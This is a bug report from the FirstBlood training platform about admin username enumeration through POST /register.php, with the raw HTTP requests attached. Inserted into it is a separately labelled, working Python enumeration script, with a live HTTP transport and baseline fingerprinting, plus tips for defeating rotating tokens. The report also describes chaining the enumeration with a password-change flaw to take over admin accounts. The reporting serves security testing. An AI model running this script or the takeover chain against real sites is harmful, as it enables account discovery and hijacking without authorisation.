FirstBlood-#886 — Drpanel admin username enumeration
This issue was discovered on FirstBlood v2
On 2021-10-30, 0x1452 Level 3 reported:
Hey!
Summary
I noticed that the endpoint POST /register.php returns a different response if username is set to an admin account's name.
Compare the following two responses:
Non-admin username
POST /register.php HTTP/1.1
Host: 46d069c58ee9-0x1452.a.firstbloodhackers.com
Content-Length: 50
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://46d069c58ee9-0x1452.a.firstbloodhackers.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://46d069c58ee9-0x1452.a.firstbloodhackers.com/register.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=register&username=admin&inviteCode=whatever
Admin username (drAdmin)
POST /register.php HTTP/1.1
Host: 46d069c58ee9-0x1452.a.firstbloodhackers.com
Content-Length: 52
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://46d069c58ee9-0x1452.a.firstbloodhackers.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://46d069c58ee9-0x1452.a.firstbloodhackers.com/register.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=register&username=drAdmin&inviteCode=whatever
Steps to reproduce
- Navigate to /register.php
- Try to register any username with any invite code
- Repeat until you find an admin -> e.g. drAdmin
Impact
While the impact is pretty low on its own, this could be used in combination with the account takeover reported in report #519. By brute-forcing a list of usernames on the register endpoint, an attacker can find valid admin accounts, then change their passwords.
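The enumeration loop from the steps above, written out as an added example; this is not code from the report or from FirstBlood. It assumes only what the report states: POST /register.php with action=register, username and inviteCode answers differently when username belongs to an admin account. The page does not show the two response bodies, so the stub used for the offline run returns constructed texts, and the hypothetical per-request token in them exists only to show why raw body comparison is not enough. The real transport (http_sender) posts the same form body the report captured.

```python
"""Differential username enumeration against a registration endpoint.

Added example, not the reporter's or FirstBlood's code. Assumed behaviour
(from the report): /register.php replies differently for admin usernames.
The stub responses below are constructed for the demo, not taken from the page.
"""
import re
import secrets
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable

Response = tuple[int, str]          # (HTTP status, body)
Sender = Callable[[str], Response]  # username -> response

# Long hex runs and long digit runs (CSRF tokens, timestamps) change between
# requests and must not count as a "different response". Assumption for the demo.
_VOLATILE = re.compile(r"[0-9a-fA-F]{16,}|\d{10,}")


def http_sender(base_url: str, invite_code: str = "whatever") -> Sender:
    """Real transport: POSTs the form body shown in the report to /register.php."""
    def send(username: str) -> Response:
        data = urllib.parse.urlencode(
            {"action": "register", "username": username, "inviteCode": invite_code}
        ).encode()
        req = urllib.request.Request(
            base_url.rstrip("/") + "/register.php", data=data, method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded"},
        )
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:  # 4xx/5xx bodies are still signal
            return err.code, err.read().decode(errors="replace")
    return send


def fingerprint(resp: Response) -> tuple[int, str]:
    """Reduce a response to (status, body with whitespace collapsed and volatile
    tokens removed) so that only the server's branch, not noise, is compared."""
    status, body = resp
    return status, _VOLATILE.sub("", " ".join(body.split()))


def baseline(send: Sender, probes: int = 3) -> tuple[int, str]:
    """Fingerprint of the 'unknown username' branch, taken from random names
    that cannot exist. The probes must agree, or the fingerprint is too weak."""
    fps = {fingerprint(send("zz_" + secrets.token_hex(6))) for _ in range(probes)}
    if len(fps) != 1:
        raise RuntimeError("baseline responses differ; refine fingerprint()")
    return fps.pop()


def enumerate_usernames(send: Sender, candidates: Iterable[str]) -> list[str]:
    """Return every candidate whose response does not match the baseline."""
    base = baseline(send)
    return [name for name in candidates if fingerprint(send(name)) != base]


def stub_sender(admins: frozenset[str]) -> Sender:
    """Offline stand-in for the target. Texts and the CSRF-style token are
    constructed for this demo; the page does not show the real responses."""
    def send(username: str) -> Response:
        token = secrets.token_hex(16)  # differs per request, like a form token
        if username in admins:
            return 200, f"<p>That username is reserved.</p><input value={token}>"
        return 200, f"<p>Invalid invite code.</p><input value={token}>"
    return send


if __name__ == "__main__":
    # Offline run against the stub; swap in http_sender("https://host") for a live target.
    send = stub_sender(frozenset({"drAdmin"}))
    print(enumerate_usernames(send, ["admin", "drAdmin", "test", "drDoctor"]))
```

The baseline step matters more than the wordlist: a tester who compares raw bodies will see every username as "different" because of the rotating token, and one who compares only Content-Length will miss a branch that happens to produce the same length. Establishing the unknown-username fingerprint from several random names and insisting they agree catches both problems before the wordlist is spent.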
P4 Low
Endpoint: /register.php
Parameter: username
Payload: any string
FirstBlood ID: 27
Vulnerability Type: Application/Business Logic
It is possible to edit the admin's password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.
Creator & Administrator
Hi there, we don't have a unique bug for enumerating usernames on FirstBlood and I'm going to assign ID 27 for this as the description mentions enumerating :) Nice work though!